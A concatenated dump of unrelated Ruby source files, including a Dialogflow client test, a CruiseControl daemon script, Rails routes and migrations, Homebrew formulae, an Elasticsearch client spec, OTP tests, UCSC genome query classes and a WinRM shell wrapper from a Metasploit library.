= GRPC::ActiveCall::Operation.new nil grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure grpc_options = {} # Create request parameters for a unary method. parent = "hello world" latest_message = "hello world" context_size = 42 compile_suggestion_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:| assert_equal :compile_suggestion, name assert_kind_of ::Google::Cloud::Dialogflow::V2beta1::CompileSuggestionRequest, request assert_equal "hello world", request["parent"] assert_equal "hello world", request["latest_message"] assert_equal 42, request["context_size"] refute_nil options end Gapic::ServiceStub.stub :new, compile_suggestion_client_stub do # Create client client = ::Google::Cloud::Dialogflow::V2beta1::Participants::Client.new do |config| config.credentials = grpc_channel end # Use hash object client.compile_suggestion({ parent: parent, latest_message: latest_message, context_size: context_size }) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use named arguments client.compile_suggestion parent: parent, latest_message: latest_message, context_size: context_size do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object client.compile_suggestion ::Google::Cloud::Dialogflow::V2beta1::CompileSuggestionRequest.new(parent: parent, latest_message: latest_message, context_size: context_size) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use hash object with options client.compile_suggestion({ parent: parent, latest_message: latest_message, context_size: context_size }, grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object with options client.compile_suggestion(::Google::Cloud::Dialogflow::V2beta1::CompileSuggestionRequest.new(parent: parent, latest_message: latest_message, context_size: context_size), grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Verify method calls assert_equal 5, compile_suggestion_client_stub.call_rpc_count end end def test_configure grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure client = block_config = config = nil Gapic::ServiceStub.stub :new, nil do client = ::Google::Cloud::Dialogflow::V2beta1::Participants::Client.new do |config| config.credentials = grpc_channel end end config = client.configure do |c| block_config = c end assert_same block_config, config assert_kind_of ::Google::Cloud::Dialogflow::V2beta1::Participants::Client::Configuration, config end end
43.718973
312
0.73322
4a198ee6b1bba1f8a8791f0ecaf1c8e13533e0e3
1,632
# Features of this script: # * No need to modify, configurable via calling script # * Runs as correct user even on system boot # * Allows control over cruise environment and start command # * Logs environment and startup errors to help debug failures when cruise is started via system boot # * Returns correct return codes from cruise start/stop commands (but there are still issues, see http://tinyurl.com/69ary5) # * Ensures log files are owned by cruise user, not root require "fileutils" include FileUtils require "rubygems" begin gem 'mongrel' rescue => e puts "Error: daemon mode of CC.rb requires mongrel installed" exit 1 end def log(log_suffix, output) init_log_cmd = "touch #{CRUISE_HOME}/log/cruise_daemon_#{log_suffix}.log" system(su_if_needed(init_log_cmd)) File.open("#{CRUISE_HOME}/log/cruise_daemon_#{log_suffix}.log", "a+"){|f| f << output + "\n\n"} end def su_if_needed(cmd) "su - #{CRUISE_USER} -c '#{cmd}'" if CRUISE_USER != ENV['USER'] end def start_cruise(start_cmd = "cd #{CRUISE_HOME} && ./cruise start -d") log(:env, ENV.inspect) output = `#{su_if_needed(start_cmd)} 2>&1` if $?.success? print output + "\n" exit 0 else log(:err, output) print output + "\n" exit 1 end end def stop_cruise failed = false failed ||= !(system "mongrel_rails stop -P #{CRUISE_HOME}/tmp/pids/mongrel.pid") Dir["#{CRUISE_HOME}/tmp/pids/builders/*.pid"].each do |pid_file| pid = File.open(pid_file){|f| f.read } failed ||= !(system "kill -9 #{pid}") rm pid_file end if failed log(:err, "'stop' command failed") exit 1 else exit 0 end end
27.661017
124
0.685662
ff1c2391b58c0aa107e1c2d53d1a8c594939143d
289
def power_number(base, power) aux = 0 result = 1 until aux == power aux += 1 result *= base end # Caso não tenha um "return" no bloco executável da função # Ela retorna o último resultado calculado em sua última linha # Nesse caso, é o próprio result result end
18.0625
64
0.67128
016ed26594d9985fe1dd3a0d801306a8b1b2b1ce
1,093
{ matrix_id: '581', name: 'mark3jac020sc', group: 'Hollinger', description: 'Jacobian from MULTIMOD Mark3, oldstack 020 (scaled)', author: 'P. Hollinger', editor: 'T. Davis', date: '2001', kind: 'economic problem', problem_2D_or_3D: '0', num_rows: '9129', num_cols: '9129', nonzeros: '52883', num_explicit_zeros: '3292', num_strongly_connected_components: '321', num_dmperm_blocks: '321', structural_full_rank: 'true', structural_rank: '9129', pattern_symmetry: '0.074', numeric_symmetry: '0.007', rb_type: 'real', structure: 'unsymmetric', cholesky_candidate: 'no', positive_definite: 'no', norm: '2.344687e+06', min_singular_value: '2.792123e-08', condition_number: '8.397506e+13', svd_rank: '9102', sprank_minus_rank: '27', null_space_dimension: '27', full_numerical_rank: 'no', svd_gap: '1.201678', image_files: 'mark3jac020sc.png,mark3jac020sc_dmperm.png,mark3jac020sc_scc.png,mark3jac020sc_svd.png,mark3jac020sc_APlusAT_graph.gif,mark3jac020sc_graph.gif,', }
31.228571
163
0.671546
bba26c758d2a57bbf31da4c71ec445d7b7f95893
3,159
class PlaceInfectionCommand prepend SimpleCommand def initialize(game:, staticid:, quantity:, color: nil, outbreakids: []) @game = game @staticid = staticid @quantity = quantity @color = color || city.color @outbreakids = outbreakids end def call set_before_quantity infection.update!(quantity: quantities.min) if can_infect? trigger_outbreak if outbreak? check_infections_used end private attr_reader :game, :color def trigger_outbreak @outbreakids << @staticid game.increment!(:outbreaks_nr) game.finished! if game.outbreaks_nr == 8 city.neighbors.each do |neighbor| next if @outbreakids.include?(neighbor.staticid) PlaceInfectionCommand.new( game: game, staticid: neighbor.staticid, quantity: 1, color: city.color, outbreakids: @outbreakids ).call end end def infection @infection ||= game.infections .find_or_create_by!(color: color, city_staticid: @staticid) end def total_quantity @total_quantity ||= infection.quantity + @quantity end def city @city ||= City.find(@staticid) end def other_infections_total_quantity @other_infections_total_quantity ||= game.infections .where(city_staticid: @staticid) .where.not(color: color) .total_quantity end def quantities [total_quantity, 3 - other_infections_total_quantity] end def set_before_quantity @before_quantity ||= game.infections .where(city_staticid: @staticid) .total_quantity end def outbreak? @before_quantity + @quantity > 3 end def can_infect? return false if neighboring_location_includes_quarantine_specialist? return false if players_at_current_location.include?(quarantine_specialist) return false if medic_prevents_infection? return false if disease_eradicated? true end def medic game.players.find_by(role: Player.roles.keys[2]) end def quarantine_specialist game.players.find_by(role: Player.roles.keys[4]) end def cure_marker game.cure_markers.find_by(color: color) end def neighboring_location_includes_quarantine_specialist? players_at_neighboring_locations.include?(quarantine_specialist) end def players_at_neighboring_locations @players_at_neighboring_locations ||= game.players .where(location_staticid: city.neighbors_staticids) end def medic_prevents_infection? players_at_current_location.include?(medic) && cure_marker&.cured? end def players_at_current_location @players_at_current_location ||= game.players .where(location_staticid: @staticid) end def check_infections_used CureMarker.colors.keys.each do |color| check_infections(color: color) end end def check_infections(color:) infection_quantity = all_infections.select do |infection| infection.color == color end.sum(&:quantity) game.finished! if infection_quantity >= 24 end def all_infections @all_infections ||= game.infections end def disease_eradicated? game.cure_markers.find_by(color: city.color)&.eradicated? end end
23.931818
79
0.721431
e8fadf1ae00e8d8f652e2f37a56250ca5bcc86c8
607
class SoftDelete < ActiveRecord::Migration def change add_column :organizations, :deleted_at, :datetime add_index :organizations, :deleted_at add_column :assignments, :deleted_at, :datetime add_index :assignments, :deleted_at add_column :assignment_invitations, :deleted_at, :datetime add_index :assignment_invitations, :deleted_at add_column :group_assignments, :deleted_at, :datetime add_index :group_assignments, :deleted_at add_column :group_assignment_invitations, :deleted_at, :datetime add_index :group_assignment_invitations, :deleted_at end end
31.947368
68
0.771005
f7136f97bb3d90b09ec8184519b605ee137cc178
1,514
require "tmpdir" require "pathname" module Resume module CLI # Module containing functions concerning interacting with the # local file system. # # @author Paul Fioravanti module FileSystem # Represents the ?dl=1 parameter on a Dropbox link. DOWNLOAD_PARAMETER_REGEX = /\?.+\z/ private_constant :DOWNLOAD_PARAMETER_REGEX module_function # Attempts to open a file in a system-appropriate way. # # @param filename [String] The filename to open. # @return [true] if the document can be opened successfully. # @return [false] if the document cannot be opened successfully. # @return [nil] if it is unknown how to attempt to open the document. def open_document(filename) case RUBY_PLATFORM when /darwin/ system("open", filename) when /linux/ system("xdg-open", filename) when /windows/ system("cmd", "/c", "\"start #{filename}\"") else Output.warning(:dont_know_how_to_open_resume) end end # Derive a system-independent tmpfile path from a `filename`. # # @param filename [String] The filename to create a tmpfile path for. # @return [Pathname] The generated tmpfile pathname for `filename`. def tmpfile_path(filename) # Ensure that the ?dl=1 parameter is removed Pathname.new(Dir.tmpdir).join( filename.sub(DOWNLOAD_PARAMETER_REGEX, "") ) end end end end
30.897959
75
0.635403
edc09532add4fb4fff91d6b9cf56abe365839ab1
373
Rails.application.routes.draw do root 'static_pages#home' get '/help', to: 'static_pages#help' get '/about', to: 'static_pages#about' get '/contact', to: 'static_pages#contact' get '/signup', to: 'users#new' get '/login', to: 'sessions#new' post '/login', to: 'sessions#create' delete '/logout', to: 'sessions#destroy' resources :users end
31.083333
45
0.648794
1a3f039090e8fa22c2389b797c6b182206855982
2,266
if ENV['SIMPLECOV'] require 'simplecov' SimpleCov.start end if ENV['COVERALLS'] require 'coveralls' Coveralls.wear_merged! end require 'factory_girl' require 'composer' # Requires supporting ruby files with custom matchers and macros, etc, # in spec/support/ and its subdirectories. Dir[File.join(File.dirname(__FILE__), 'support/**/*.rb')].each {|f| require f } # Requires supporting ruby files with custom matchers and macros, etc, # in spec/support/ and its subdirectories. Dir[File.join(File.dirname(__FILE__), 'factories/**/*.rb')].each {|f| require f } # This file was generated by the `rspec --init` command. Conventionally, all # specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`. # Require this file using `require "spec_helper"` to ensure that it is only # loaded once. # # See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration RSpec.configure do |config| config.mock_framework = :rspec # rspec-expectations config goes here. You can use an alternate # assertion/expectation library such as wrong or the stdlib/minitest # assertions if you prefer. config.expect_with :rspec do |expectations| # This option will default to `true` in RSpec 4. It makes the `description` # and `failure_message` of custom matchers include text for helper methods # defined using `chain`, e.g.: # be_bigger_than(2).and_smaller_than(4).description # # => "be bigger than 2 and smaller than 4" # ...rather than: # # => "be bigger than 2" expectations.include_chain_clauses_in_custom_matcher_descriptions = true end # rspec-mocks config goes here. You can use an alternate test double # library (such as bogus or mocha) by changing the `mock_with` option here. config.mock_with :rspec do |mocks| # Prevents you from mocking or stubbing a method that does not exist on # a real object. This is generally recommended, and will default to # `true` in RSpec 4. mocks.verify_partial_doubles = true end # Run specs in random order to surface order dependencies. If you find an # order dependency and want to debug it, you can fix the order by providing # the seed, which is printed after each run. # --seed 1234 config.order = 'random' end
37.147541
81
0.723742
01b4ae9c0d5e706dc7a0d71709c538113364076d
2,448
class AmplMp < Formula desc "The AMPL modeling language solver library" homepage "http://www.ampl.com" url "https://github.com/ampl/mp/archive/3.1.0.tar.gz" sha256 "587c1a88f4c8f57bef95b58a8586956145417c8039f59b1758365ccc5a309ae9" bottle do cellar :any sha256 "4bf7fc7253661a1fb16fe1b07f6b4eeeb4dcecd6303199d959c98106eb1a059b" => :sierra sha256 "43d48bd9aca07ba0b30e7aa4f43f1cbac248cc6d92d245413a698352595ef5c2" => :el_capitan sha256 "a031b84d6695d5bcb4f461af062ebf0e0afc2484966704edf27e7e847bfd8b1a" => :yosemite end option "with-matlab", "Build MEX files for use with Matlab" option "with-mex-path=", "Path to MEX executable, e.g., /path/to/MATLAB.app/bin/mex (default: mex)" option "without-test", "Skip build-time tests (not recommended)" depends_on "cmake" => :build depends_on "doxygen" => :optional resource "miniampl" do url "https://github.com/dpo/miniampl/archive/v1.0.tar.gz" sha256 "b836dbf1208426f4bd93d6d79d632c6f5619054279ac33453825e036a915c675" end def install cmake_args = ["-DCMAKE_INSTALL_PREFIX=#{prefix}", "-DCMAKE_BUILD_TYPE=None", "-DCMAKE_FIND_FRAMEWORK=LAST", "-DCMAKE_VERBOSE_MAKEFILE=ON", "-Wno-dev", "-DBUILD_SHARED_LIBS=True"] cmake_args << ("-DMATLAB_MEX=" + (ARGV.value("with-mex-path") || "mex")) if build.with? "matlab" system "cmake", ".", *cmake_args system "make", "all" system "make", "test" if build.with? "test" system "install_name_tool", "-change", "@rpath/libmp.3.dylib", lib/"libmp.dylib", "bin/libasl.dylib" if OS.mac? system "make", "install" mkdir libexec mv bin, libexec/"bin" if build.with? "matlab" mkdir_p (pkgshare/"matlab") mv Dir["#{libexec}/bin/*.mex*"], pkgshare/"matlab" end resource("miniampl").stage do system "make", "SHELL=/bin/bash", "CXX=#{ENV["CC"]} -std=c99", "LIBAMPL_DIR=#{prefix}", "LIBS=-L$(LIBAMPL_DIR)/lib -lasl -lm -ldl" bin.install "bin/miniampl" (pkgshare/"example").install "Makefile", "README.rst", "src", "examples" end end def caveats s = "" if build.with? "matlab" s += <<-EOS.undent Matlab interfaces have been installed to #{opt_pkgshare}/matlab EOS end s end test do cp Dir["#{opt_pkgshare}/example/examples/*"], testpath cd testpath do system "#{opt_bin}/miniampl", "wb", "showname=1", "showgrad=1" end end end
34.478873
136
0.669935
bbef1bdc8dc14e751b907735b0361aede7bbd2b8
6,862
require "logstash/devutils/rspec/spec_helper" require "logstash/outputs/elasticsearch" require "logstash/outputs/elasticsearch/http_client" require "logstash/outputs/elasticsearch/http_client_builder" describe LogStash::Outputs::ElasticSearch::HttpClientBuilder do describe "auth setup with url encodable passwords" do let(:klass) { LogStash::Outputs::ElasticSearch::HttpClientBuilder } let(:user) { "foo@bar"} let(:password) {"bazblah" } let(:password_secured) do secured = double("password") allow(secured).to receive(:value).and_return(password) secured end let(:options) { {"user" => user, "password" => password} } let(:logger) { mock("logger") } let(:auth_setup) { klass.setup_basic_auth(double("logger"), {"user" => user, "password" => password_secured}) } it "should return the user verbatim" do expect(auth_setup[:user]).to eql(user) end it "should return the password verbatim" do expect(auth_setup[:password]).to eql(password) end context "passwords that need escaping" do let(:password) { "foo@bar#" } it "should escape the password" do expect(auth_setup[:password]).to eql("foo%40bar%23") end end end describe "customizing action paths" do let(:hosts) { [ ::LogStash::Util::SafeURI.new("http://localhost:9200") ] } let(:options) { {"hosts" => hosts } } let(:logger) { double("logger") } before :each do [:debug, :debug?, :info?, :info, :warn].each do |level| allow(logger).to receive(level) end end describe "healthcheck_path" do context "when setting bulk_path" do let(:bulk_path) { "/meh" } let(:options) { super.merge("bulk_path" => bulk_path) } context "when using path" do let(:options) { super.merge("path" => "/path") } it "ignores the path setting" do expect(described_class).to receive(:create_http_client) do |options| expect(options[:bulk_path]).to eq(bulk_path) end described_class.build(logger, hosts, options) end end context "when not using path" do it "uses the bulk_path setting" do expect(described_class).to receive(:create_http_client) do |options| expect(options[:bulk_path]).to eq(bulk_path) end described_class.build(logger, hosts, options) end end end context "when not setting bulk_path" do context "when using path" do let(:path) { "/meh" } let(:options) { super.merge("path" => path) } it "sets bulk_path to path+_bulk" do expect(described_class).to receive(:create_http_client) do |options| expect(options[:bulk_path]).to eq("#{path}/_bulk") end described_class.build(logger, hosts, options) end end context "when not using path" do it "sets the bulk_path to _bulk" do expect(described_class).to receive(:create_http_client) do |options| expect(options[:bulk_path]).to eq("/_bulk") end described_class.build(logger, hosts, options) end end end end describe "healthcheck_path" do context "when setting healthcheck_path" do let(:healthcheck_path) { "/meh" } let(:options) { super.merge("healthcheck_path" => healthcheck_path) } context "when using path" do let(:options) { super.merge("path" => "/path") } it "ignores the path setting" do expect(described_class).to receive(:create_http_client) do |options| expect(options[:healthcheck_path]).to eq(healthcheck_path) end described_class.build(logger, hosts, options) end end context "when not using path" do it "uses the healthcheck_path setting" do expect(described_class).to receive(:create_http_client) do |options| expect(options[:healthcheck_path]).to eq(healthcheck_path) end described_class.build(logger, hosts, options) end end end context "when not setting healthcheck_path" do context "when using path" do let(:path) { "/meh" } let(:options) { super.merge("path" => path) } it "sets healthcheck_path to path" do expect(described_class).to receive(:create_http_client) do |options| expect(options[:healthcheck_path]).to eq(path) end described_class.build(logger, hosts, options) end end context "when not using path" do it "sets the healthcheck_path to root" do expect(described_class).to receive(:create_http_client) do |options| expect(options[:healthcheck_path]).to eq("/") end described_class.build(logger, hosts, options) end end end end describe "sniffing_path" do context "when setting sniffing_path" do let(:sniffing_path) { "/meh" } let(:options) { super.merge("sniffing_path" => sniffing_path) } context "when using path" do let(:options) { super.merge("path" => "/path") } it "ignores the path setting" do expect(described_class).to receive(:create_http_client) do |options| expect(options[:sniffing_path]).to eq(sniffing_path) end described_class.build(logger, hosts, options) end end context "when not using path" do it "uses the sniffing_path setting" do expect(described_class).to receive(:create_http_client) do |options| expect(options[:sniffing_path]).to eq(sniffing_path) end described_class.build(logger, hosts, options) end end end context "when not setting sniffing_path" do context "when using path" do let(:path) { "/meh" } let(:options) { super.merge("path" => path) } it "sets sniffing_path to path+_nodes/http" do expect(described_class).to receive(:create_http_client) do |options| expect(options[:sniffing_path]).to eq("#{path}/_nodes/http") end described_class.build(logger, hosts, options) end end context "when not using path" do it "sets the sniffing_path to _nodes/http" do expect(described_class).to receive(:create_http_client) do |options| expect(options[:sniffing_path]).to eq("/_nodes/http") end described_class.build(logger, hosts, options) end end end end end end
35.371134
115
0.598805
e9982edf1aeb345d170bb724d17a4bdbbecbb6e1
2,844
require "test_helper" class OtpTest < MiniTest::Unit::TestCase def setup @user = User.new @user.email = '[email protected]' @user.run_callbacks :create @visitor = Visitor.new @visitor.email = '[email protected]' @visitor.run_callbacks :create end def test_authenticate_with_otp code = @user.otp_code assert @user.authenticate_otp(code) code = @visitor.otp_code assert @visitor.authenticate_otp(code) end def test_authenticate_with_otp_when_drift_is_allowed code = @user.otp_code(Time.now - 30) assert @user.authenticate_otp(code, drift: 60) code = @visitor.otp_code(Time.now - 30) assert @visitor.authenticate_otp(code, drift: 60) end def test_otp_code assert_match(/^\d{6}$/, @user.otp_code.to_s) assert_match(/^\d{4}$/, @visitor.otp_code.to_s) end def test_otp_code_with_specific_length assert_match(/^\d{4}$/, @visitor.otp_code(time: 2160, padding: true).to_s) assert_operator(@visitor.otp_code(time: 2160, padding: false).to_s.length, :<= , 4) end def test_otp_code_without_specific_length assert_match(/^\d{6}$/, @user.otp_code(time: 2160, padding: true).to_s) assert_operator(@user.otp_code(time: 2160, padding: false).to_s.length, :<= , 6) end def test_otp_code_padding @user.otp_column = 'kw5jhligwqaiw7jc' assert_match(/^\d{6}$/, @user.otp_code(time: 2160, padding: true).to_s) # Modified this spec as it is not guranteed that without padding we will always # get a 3 digit number assert_operator(@user.otp_code(time: 2160, padding: false).to_s.length, :<= , 6) end def test_provisioning_uri_with_provided_account assert_match %r{otpauth://totp/roberto\?secret=\w{16}}, @user.provisioning_uri("roberto") assert_match %r{otpauth://totp/roberto\?secret=\w{16}}, @visitor.provisioning_uri("roberto") end def test_provisioning_uri_with_email_field assert_match %r{otpauth://totp/roberto@heapsource\.com\?secret=\w{16}}, @user.provisioning_uri assert_match %r{otpauth://totp/roberto@heapsource\.com\?secret=\w{16}}, @visitor.provisioning_uri end def test_provisioning_uri_with_options assert_match %r{otpauth://totp/roberto@heapsource\.com\?issuer=Example&secret=\w{16}},@user.provisioning_uri(nil,issuer: "Example") assert_match %r{otpauth://totp/roberto@heapsource\.com\?issuer=Example&secret=\w{16}}, @visitor.provisioning_uri(nil,issuer: "Example") assert_match %r{otpauth://totp/roberto\?issuer=Example&secret=\w{16}}, @user.provisioning_uri("roberto", issuer: "Example") assert_match %r{otpauth://totp/roberto\?issuer=Example&secret=\w{16}}, @visitor.provisioning_uri("roberto", issuer: "Example") end def test_regenerate_otp secret = @user.otp_column @user.otp_regenerate_secret assert secret != @user.otp_column end end
36.935065
139
0.722925
ac34956fe853906b50b561d40d496d16a3475a8e
1,042
# coding: utf-8 lib = File.expand_path('../lib', __FILE__) $LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib) require 'nymphia/version' Gem::Specification.new do |spec| spec.name = 'nymphia' spec.version = Nymphia::VERSION spec.authors = ['mozamimy (Moza USANE)'] spec.email = ['[email protected]'] spec.summary = 'Create your SSH config without any pain.' spec.description = 'Create your SSH config without any pain.' spec.homepage = 'https://github.com/mozamimy/nymphia' spec.license = 'MIT' spec.files = `git ls-files -z`.split("\x0").reject do |f| f.match(%r{^(test|spec|features)/}) end spec.bindir = 'exe' spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) } spec.require_paths = ['lib'] spec.add_development_dependency 'bundler', '~> 1.13' spec.add_development_dependency 'rake', '~> 10.0' spec.add_development_dependency 'rspec', '~> 3.0' spec.add_development_dependency 'timecop', '~> 0.8.0' end
35.931034
74
0.645873
e8f8383d0e2dfc1b319e055434b8e07a093a9617
1,327
$:.unshift 'lib' require 'benchmark/ips' require 'mustache' template = """ {{#products}} <div class='product_brick'> <div class='container'> <div class='element'> <img src='images/{{image}}' class='product_miniature' /> </div> <div class='element description'> <a href={{url}} class='product_name block bold'> {{external_index}} </a> </div> </div> </div> {{/products}} """ data_10 = { products: [] } 10.times do data_10[:products] << { :external_index=>"product", :url=>"/products/7", :image=>"products/product.jpg" } end data_100 = { products: [] } 100.times do data_100[:products] << { :external_index=>"product", :url=>"/products/7", :image=>"products/product.jpg" } end data_1000 = { products: [] } 1000.times do data_1000[:products] << { :external_index=>"product", :url=>"/products/7", :image=>"products/product.jpg" } end view = Mustache.new view.template = template view.render # Call render once so the template will be compiled Benchmark.ips do |x| x.report("render list of 10") do |times| view.render(data_10) end x.report("render list of 100") do |times| view.render(data_100) end x.report("render list of 1000") do |times| view.render(data_1000) end end
17.460526
64
0.605878
7aa2f0fc0fca17d3e64acc6cc75887aa77b12acf
361
cask "snagit" do version "2021.0.2" sha256 :no_check # required as upstream package is updated in-place url "https://download.techsmith.com/snagitmac/releases/Snagit.dmg" name "Snagit" desc "Screen capture software" homepage "https://www.techsmith.com/screen-capture.html" depends_on macos: ">= :mojave" app "Snagit #{version.major}.app" end
25.785714
69
0.725762
e9d21e04a2cfadf644e1bfc3bba576fde74a822d
4,015
require 'winrm' require 'winrm/wsmv/write_stdin' require 'net/winrm/ctrl_c' require 'net/winrm/receive_response_reader' module Net module MsfWinRM # WinRM shell to use stdin, rather than sending isolated commands class StdinShell < WinRM::Shells::Cmd # We create our own empty finalizers because the built-in one triggers a # request using the Rex HTTP client, which segfaults; possibly because it # creates a thread, or something else that is not allowed in a finalizer. # In this situation (observed only when the user quits MSF with active sessions), # we'll just let the shell continue. def remove_finalizer; end def add_finalizer; end def send_command(command, arguments = []) open unless shell_id super(command, arguments) end # Runs a shell command synchronously, and returns the output def shell_command_synchronous(command, args, timeout) start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :millisecond) command_id = send_command(command, args) buffer = [] begin while (Process.clock_gettime(Process::CLOCK_MONOTONIC, :millisecond) - start_time) < (timeout * 1000) read_stdout(command_id) do |stdout, stderr| buffer << stdout if stdout buffer << stderr if stderr end end rescue EOFError # Shell terminated of its own accord ensure cleanup_command(command_id) end buffer.join('') end # Runs the specified command with optional arguments # @param block [&block] The optional callback for any realtime output # @yieldparam [string] standard out response text # @yieldparam [string] standard error response text # @yieldreturn [WinRM::Output] The command output def read_stdout(command_id, &block) open unless shell_id begin response_reader.read_output(command_output_message(shell_id, command_id), &block) rescue WinRM::WinRMWSManFault => e # If no output is available before the wsman:OperationTimeout expires, # the server MUST return a WSManFault with the Code attribute equal to # 2150858793. When the client receives this fault, it SHOULD issue # another Receive request. # http://msdn.microsoft.com/en-us/library/cc251676.aspx if e.fault_code == '2150858793' yield nil, nil else raise end end end def send_ctrl_c(command_id) ctrl_c_msg = CtrlC.new( connection_opts, shell_uri: shell_uri, shell_id: shell_id, command_id: command_id ) transport.send_request(ctrl_c_msg.build) end def send_stdin(input, command_id) open unless shell_id stdin_msg = WinRM::WSMV::WriteStdin.new( connection_opts, shell_uri: shell_uri, shell_id: shell_id, command_id: command_id, stdin: input ) result = transport.send_request(stdin_msg.build) result rescue WinRM::WinRMWSManFault => e raise unless [ERROR_OPERATION_ABORTED, SHELL_NOT_FOUND].include?(e.fault_code) rescue WinRM::WinRMHTTPTransportError => e # dont let the cleanup raise so we dont lose any errors from the command logger.info("[WinRM] #{e.status_code} returned in cleanup with error: #{e.message}") end def response_reader @response_reader ||= ReceiveResponseReader.new(transport, logger) end def open_shell msg = WinRM::WSMV::CreateShell.new(connection_opts, shell_opts) resp_doc = transport.send_request(msg.build) match = REXML::XPath.first(resp_doc, '//rsp:Owner') self.owner = match.text if match REXML::XPath.first(resp_doc, "//*[@Name='ShellId']").text end attr_accessor :owner end end end
35.530973
111
0.645579
f716f6c1c5d1566ee0fb5c7346a9a01a5f8238f6
639
require_relative '../../lib/inspect_parameter_source' describe InspectParameterSource do let(:source) { double } let(:headers) { Hash.new } subject { InspectParameterSource.new(source) } describe "#language" do before { source.stub_chain(:request, :headers).and_return(headers) } context "when language is set" do before { headers['HTTP_ACCEPT_LANGUAGE'] = 'en;en-us' } it "returns the set value" do expect(subject.language).to eq('en') end end context "when there is no language set" do it "return nil" do expect(subject.language).to be_nil end end end end
24.576923
72
0.661972
bb1f87a9576b6f429a294ef339c3aed1b1ee7418
3,117
# Copyright:: # Copyright (C) 2011 MISHIMA, Hiroyuki <missy at be.to / hmishima at nagasaki-u.ac.jp> # License:: The Ruby licence (Ryby's / GPLv2 dual) # # In the hg18 database, this table is actually separated # into "chr1_*", "chr2_*", etc. This class dynamically # define *::Chr1_*, *::Chr2_*, etc. The # Rmsk.find_by_interval calls an appropreate class automatically. module Bio module Ucsc module BraFlo1 class ChainPetMar1 KLASS = "ChainPetMar1" KLASS_S = KLASS[0..0].downcase + KLASS[1..-1] Bio::Ucsc::BraFlo1::CHROMS.each do |chr| class_eval %! class #{chr[0..0].upcase + chr[1..-1]}_#{KLASS} < DBConnection self.table_name = "#{chr[0..0].downcase + chr[1..-1]}_#{KLASS_S}" self.primary_key = nil self.inheritance_column = nil def self.find_by_interval(interval, opt = {:partial => true}); interval = Bio::Ucsc::Gi.wrap(interval) find_first_or_all_by_interval(interval, :first, opt) end def self.find_all_by_interval(interval, opt = {:partial => true}); interval = Bio::Ucsc::Gi.wrap(interval) find_first_or_all_by_interval(interval, :all, opt) end def self.find_first_or_all_by_interval(interval, first_all, opt); interval = Bio::Ucsc::Gi.wrap(interval) zstart = interval.zero_start zend = interval.zero_end if opt[:partial] == true where = <<-SQL tName = :chrom AND bin in (:bins) AND ((tStart BETWEEN :zstart AND :zend) OR (tEnd BETWEEN :zstart AND :zend) OR (tStart <= :zstart AND tEnd >= :zend)) SQL else where = <<-SQL tName = :chrom AND bin in (:bins) AND ((tStart BETWEEN :zstart AND :zend) AND (tEnd BETWEEN :zstart AND :zend)) SQL end cond = { :chrom => interval.chrom, :bins => Bio::Ucsc::UcscBin.bin_all(zstart, zend), :zstart => zstart, :zend => zend, } self.find(first_all, { :select => "*", :conditions => [where, cond], }) end end ! end # each chromosome def self.find_by_interval(interval, opt = {:partial => true}); interval = Bio::Ucsc::Gi.wrap(interval) chrom = interval.chrom[0..0].upcase + interval.chrom[1..-1] chr_klass = self.const_get("#{chrom}_#{KLASS}") chr_klass.__send__(:find_by_interval, interval, opt) end def self.find_all_by_interval(interval, opt = {:partial => true}); interval = Bio::Ucsc::Gi.wrap(interval) chrom = interval.chrom[0..0].upcase + interval.chrom[1..-1] chr_klass = self.const_get("#{chrom}_#{KLASS}") chr_klass.__send__(:find_all_by_interval, interval, opt) end end # class end # module Hg18 end # module Ucsc end # module Bio
38.012195
120
0.548284
872ba1ab43d56a3e1ae3bba49251dcee3924e0a2
1,557
# frozen_string_literal: true require 'spec_helper' RSpec.describe Atlassian::JiraConnect::Serializers::PullRequestEntity do let_it_be(:project) { create_default(:project, :repository) } let_it_be(:merge_requests) { create_list(:merge_request, 2, :unique_branches) } let_it_be(:notes) { create_list(:note, 2, system: false, noteable: merge_requests.first) } subject { described_class.represent(merge_requests).as_json } it 'exposes commentCount' do expect(subject.first[:commentCount]).to eq(2) end context 'with user_notes_count option' do let(:user_notes_count) { merge_requests.map { |merge_request| [merge_request.id, 1] }.to_h } subject { described_class.represent(merge_requests, user_notes_count: user_notes_count).as_json } it 'avoids N+1 database queries' do control_count = ActiveRecord::QueryRecorder.new do described_class.represent(merge_requests, user_notes_count: user_notes_count) end.count merge_requests << create(:merge_request, :unique_branches) expect { subject }.not_to exceed_query_limit(control_count) end it 'uses counts from user_notes_count' do expect(subject.map { |entity| entity[:commentCount] }).to match_array([1, 1, 1]) end context 'when count is missing for some MRs' do let(:user_notes_count) { [[merge_requests.last.id, 1]].to_h } it 'uses 0 as default when count for the MR is not available' do expect(subject.map { |entity| entity[:commentCount] }).to match_array([0, 0, 1]) end end end end
35.386364
101
0.722543
4a563e84dde4d8e84a15a6f86f0e159a4dc06f09
629
# frozen_string_literal: true require_relative '../../command' require_relative '../../crawler/genrelist' module Yomou module Commands class Genrerank class Download < Yomou::Command def initialize(period, genre, options) @period = period @genre = genre @options = options end def execute(input: $stdin, output: $stdout) crawler = GenrelistCrawler.new options = {} options[:genres] = [@genre] if @genre options[:periods] = [@period] if @period crawler.download(options) end end end end end
23.296296
51
0.586645
334411f8476106ae3cc1c65e2ee6ca2b4d74bf6d
156
require 'test_helper' class ExtensionTest < ActiveSupport::TestCase # Replace this with your real tests. test "the truth" do assert true end end
17.333333
45
0.737179
62becaf9148776be3b6b672a72a094e293f9f693
572
